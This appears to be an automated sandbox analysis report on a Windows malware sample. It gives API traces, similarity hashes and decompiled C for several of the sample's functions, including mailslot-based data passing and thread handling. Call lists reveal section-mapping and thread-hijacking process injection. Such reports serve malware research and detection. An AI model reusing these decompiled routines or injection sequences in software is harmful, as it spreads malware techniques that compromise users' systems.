Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
